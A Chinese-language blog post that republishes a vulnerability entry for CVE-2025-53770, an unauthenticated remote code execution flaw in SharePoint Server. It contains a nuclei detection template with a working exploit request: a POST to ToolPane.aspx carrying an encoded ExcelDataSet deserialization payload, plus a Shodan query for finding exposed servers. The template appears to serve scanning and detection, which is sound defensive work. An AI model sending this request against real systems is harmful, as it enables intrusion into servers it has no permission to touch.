Microsoft SharePoint Server 反序列化漏洞

漏洞信息

漏洞名称: Microsoft SharePoint Server 反序列化漏洞

漏洞编号:

  • CVE: CVE-2025-53770

漏洞类型: 反序列化

漏洞等级: 严重

漏洞描述: Microsoft SharePoint Server是一款广泛使用的企业级协作平台,支持文档管理、内容管理、社交网络等功能,常用于企业内部的信息共享和团队协作。该产品在全球范围内有着广泛的应用,尤其是在大型企业和组织中。此次发现的漏洞属于反序列化类型,攻击者可以通过网络向目标服务器发送特制的序列化数据,利用服务器在处理这些数据时的缺陷,实现远程代码执行。漏洞的根本原因在于服务器在处理未经信任的序列化数据时,未能进行充分的验证和过滤,导致攻击者可以构造恶意数据触发代码执行。由于该漏洞允许未经身份验证的攻击者通过网络进行利用,且存在公开的利用代码,因此被评级为严重级别。攻击者成功利用此漏洞后,可以完全控制受影响的SharePoint服务器,执行任意代码,访问敏感数据,甚至进一步渗透内网。微软已经意识到该漏洞的野外利用,并正在准备全面的更新来修复此问题。在此之前,建议用户按照CVE文档中提供的临时缓解措施进行防护,以避免遭受攻击。

产品厂商: Microsoft

产品名称: SharePoint Server

搜索语法: http.component:”sharepoint”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/ea03277c3af92e2fd73e57be29f8c52eab50f28c/http%2Fcves%2F2025%2FCVE-2025-53770.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58

id: CVE-2025-53770

info:
name: Microsoft SharePoint Server - Remote Code Execution
author: SamIntruder
severity: critical
description: |
Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.
impact: |
Unauthenticated attackers can exploit unsafe deserialization to achieve remote code execution on SharePoint Server, leading to full system compromise.
remediation: |
Apply the latest security patches from Microsoft or implement the temporary mitigations provided in the CVE documentation until a comprehensive update is available.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-53770
- https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/
- https://github.com/hazcod/CVE-2025-53770/blob/main/pkg/payload/test_payload.go
- https://x.com/codewhitesec/status/1944743478350557232
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-53770
cwe-id: CWE-502
metadata:
verified: true
max-request: 1
shodan-query: http.component:"sharepoint"
tags: cve,cve2025,kev,sharepoint,rce,microsoft

http:
- raw:
- |
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: {{Host}}
Referer: /_layouts/SignOut.aspx
Content-Type: application/x-www-form-urlencoded

MSOTlPn_Uri={{Scheme}}://{{Host}}&MSOTlPn_DWP=%0A%3C%25%40%20Register%20Tagprefix%3D%22Scorecard%22%20Namespace%3D%22Microsoft%2EPerformancePoint%2EScorecards%22%20Assembly%3D%22Microsoft%2EPerformancePoint%2EScorecards%2EClient%2C%20Version%3D16%2E0%2E0%2E0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D71e9bce111e9429c%22%20%25%3E%0A%3C%25%40%20Register%20Tagprefix%3D%22asp%22%20Namespace%3D%22System%2EWeb%2EUI%22%20Assembly%3D%22System%2EWeb%2EExtensions%2C%20Version%3D4%2E0%2E0%2E0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35%22%20%25%3E%0A%3Casp%3AUpdateProgress%20ID%3D%22UpdateProgress1%22%20DisplayAfter%3D%2210%22%20runat%3D%22server%22%20AssociatedUpdatePanelID%3D%22upTest%22%3E%0A%20%20%3CProgressTemplate%3E%0A%20%20%20%20%3Cdiv%20class%3D%22divWaiting%22%3E%0A%20%20%20%20%20%20%3CScorecard%3AExcelDataSet%20CompressedDataTable%3D%22H4sIAADEfmgA%2F4WRX2uzMBTG7%2F0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9%2BPEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c%2Bc1Umalp33%2F0%2F62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl%2BftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S%2FVeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1%2Bt%2Fpbj%2BvyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA%3D%22%20DataTable%2DCaseSensitive%3D%22false%22%20runat%3D%22server%22%3E%3C%2FScorecard%3AExcelDataSet%3E%0A%20%20%20%20%3C%2Fdiv%3E%0A%20%20%3C%2FProgressTemplate%3E%0A%3C%2Fasp%3AUpdateProgress%3E%0A

matchers:
- type: dsl
name: decoded_response
dsl:
- 'contains(gzip_decode(base64_decode(encoded_response)), "IntruderScannerDetectionPayload")'
- '!contains(body, "SAMLSubmitButton")'
- 'status_code == 200'
condition: and

extractors:
- type: regex
part: body
group: 1
name: encoded_response
regex:
- 'CompressedDataTable="(.*?)"'
internal: true



Microsoft SharePoint Server 反序列化漏洞
http://example.com/2025/07/23/github_3496208408/
作者
lianccc
发布于
2025年7月23日
许可协议